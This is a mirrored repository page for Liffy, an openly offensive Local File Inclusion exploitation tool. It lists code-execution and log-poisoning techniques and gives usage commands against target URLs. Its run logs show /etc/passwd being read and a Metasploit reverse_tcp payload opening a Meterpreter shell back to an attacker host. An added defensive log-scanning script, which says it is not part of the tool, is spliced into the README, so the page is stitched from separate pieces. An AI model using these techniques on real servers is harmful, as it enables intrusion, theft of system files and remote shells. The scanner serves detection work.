Language: Python
License: GNU General Publi...
Created over 8 years ago, updated over 7 years ago


Repository Details

Local File Inclusion Exploitation Tool (mirror)

Liffy

Liffy is a Local File Inclusion Exploitation tool.

Current features include:

  • data:// for code execution
  • expect:// for code execution
  • input:// for code execution
  • filter:// for arbitrary file reads
  • /proc/self/environ for code execution in CGI mode
  • Apache access.log poisoning
  • Linux auth.log SSH poisoning
  • Direct payload delivery with no stager
  • Support for absolute and relative paths
  • Support for cookies
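As a defender-side companion to the feature list above, here is an added example that is not part of Liffy or its README: it scans Apache access-log lines (constructed here, in Common Log Format) for the stream-wrapper, traversal and log/environ read-back indicators that these techniques leave in the vulnerable file= parameter. The technique names, regexes and sample lines are my own.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (Common Log Format); the lfi.php?file= parameter
# mirrors the page's example target, the client addresses and sizes are made up.
SAMPLE_LOG = """\
10.0.0.4 - - [03/Aug/2014:19:36:33 -0700] "GET /vuln/lfi.php?file=php://filter/convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 1420
10.0.0.4 - - [03/Aug/2014:19:39:39 -0700] "GET /vuln/lfi.php?file=data://text/plain;base64,aGVsbG8= HTTP/1.1" 200 512
10.0.0.4 - - [03/Aug/2014:19:41:02 -0700] "GET /vuln/lfi.php?file=/proc/self/environ HTTP/1.1" 200 2201
10.0.0.4 - - [03/Aug/2014:19:42:10 -0700] "GET /vuln/lfi.php?file=../../../../var/log/apache2/access.log HTTP/1.1" 200 90000
10.0.0.9 - - [03/Aug/2014:19:45:00 -0700] "GET /vuln/lfi.php?file=about.html HTTP/1.1" 200 3301
10.0.0.9 - - [03/Aug/2014:19:45:05 -0700] "GET /pdfs/report.php?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 3301
"""

# One indicator per technique in the README's feature list (names are mine). Stream
# wrappers are anchored at the start of the value because that is where PHP honours them.
TECHNIQUES = {
    "filter_wrapper": re.compile(r"^php://filter", re.I),
    "data_wrapper": re.compile(r"^data:", re.I),
    "expect_wrapper": re.compile(r"^expect:", re.I),
    "input_wrapper": re.compile(r"^php://input", re.I),
    "proc_environ": re.compile(r"/proc/self/environ", re.I),
    "log_poisoning_readback": re.compile(r"(access|auth)\.log", re.I),
    "path_traversal": re.compile(r"\.\.[/\\]"),
}
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def decode_value(raw, rounds=2):
    # Percent-decode up to `rounds` times so double-encoded traversal (%252e) is caught too.
    for _ in range(rounds):
        raw = unquote(raw)
    return raw

def classify_value(value):
    # Names of every technique whose indicator appears in one decoded parameter value.
    return [name for name, rx in TECHNIQUES.items() if rx.search(value)]

def scan_access_log(text):
    # Return (client, status, param, technique) for each suspicious query value in the log.
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for pair in urlsplit(m.group("target")).query.split("&"):
            name, _, raw = pair.partition("=")
            for technique in classify_value(decode_value(raw)):
                findings.append((m.group("client"), int(m.group("status")), name, technique))
    return findings
```

Findings carry the response status so a 200 on a php://filter or /proc/self/environ read can be triaged ahead of requests the server rejected.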

! I have had issues with access log poisoning on current versions of Apache. This is not an issue with the payload delivery and/or poisoning. This is more of an issue with the request after the poisoning to kick off your shell. This may require a browser refresh. !

Install

Liffy requires the following libraries: requests, argparse, blessings, urlparse, daemon

Update - Liffy now has built-in web serving functionality for all techniques that use the staged approach. This is built upon Python's SimpleHTTPServer module, and is daemonized once spawned as a process within core.py. I have had some issues with socket reuse and the child process not being killed correctly, so QA would be appreciated, and/or suggestions on how to design it better.

Example Usage

./liffy --url http://target/pdfs/vulnerable.php?= --data
./liffy --url http://target/pdfs/vulnerable.php?= --data --nostager



ruckus:liffy rotlogix$ python liffy.py --url http://10.0.0.11/vuln/lfi.php?file= --filter


    .____    .__  _____  _____
    |    |   |__|/ ____\/ ____\__.__.
    |    |   |  \   __\   __<   |  |
    |    |___|  ||  |   |  |  \___  |
    |_______ \__||__|   |__|  / ____| v1.2
        \/                \/


[2014-08-03 19:36:33.002626] Checking Target: http://10.0.0.11/vuln/lfi.php?file=
[2014-08-03 19:36:33.002722] ......................................................................
[2014-08-03 19:36:33.791168] Target URL Looks Good!
[2014-08-03 19:36:33.791210] Filter Technique Selected!
[2014-08-03 19:36:33.791336] Please Enter File To Read: /etc/passwd
[2014-08-03 19:36:38.319685] Decoded: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-
data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-
Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false mysql:x:102:105:MySQL
Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin



    .____    .__  _____  _____
    |    |   |__|/ ____\/ ____\__.__.
    |    |   |  \   __\   __<   |  |
    |    |___|  ||  |   |  |  \___  |
    |_______ \__||__|   |__|  / ____| v1.2
        \/                \/


[2014-08-03 19:39:33.674202] Checking Target: http://10.0.0.11/vuln/lfi.php?file=
[2014-08-03 19:39:33.674297] ......................................................................
[2014-08-03 19:39:34.454758] Target URL Looks Good!
[2014-08-03 19:39:34.454795] Data Technique Selected!
[2014-08-03 19:39:34.454877] Please Enter Host For Callbacks: 10.0.0.4
[2014-08-03 19:39:37.112427] Please Enter Port For Callbacks: 6666
[2014-08-03 19:39:38.597878] Generating Wrapper
[2014-08-03 19:39:38.597955] ......................................................................
[2014-08-03 19:39:39.347935] Success!
[2014-08-03 19:39:39.348007] Generating Metasploit Payload
[2014-08-03 19:39:39.348059] ......................................................................
[2014-08-03 19:39:46.289658] Generated Metasploit Resource File
[2014-08-03 19:39:46.289704] Load Metasploit: msfconsole -r php_listener.rc
[2014-08-03 19:39:46.289734] Starting Web Server ...
[2014-08-03 19:39:46.289750] ......................................................................
[2014-08-03 19:39:47.049321] Press Enter To Continue When Your Metasploit Handler is Running ...


[*] Processing php_listener.rc for ERB directives.
resource (php_listener.rc)> use multi/handler
resource (php_listener.rc)> set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (php_listener.rc)> set LHOST 10.0.0.4
LHOST => 10.0.0.4
resource (php_listener.rc)> set LPORT 6666
LPORT => 6666
resource (php_listener.rc)> set ExitOnSession false
ExitOnSession => false
resource (php_listener.rc)> exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 10.0.0.4:6666
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (40551 bytes) to 10.0.0.11
[*] Meterpreter session 1 opened (10.0.0.4:6666 -> 10.0.0.11:52410) at 2014-08-03 19:40:39 -0700
msf exploit(handler) >

Sidenote

Original release repository https://github.com/rotlogix/liffy is no longer available.
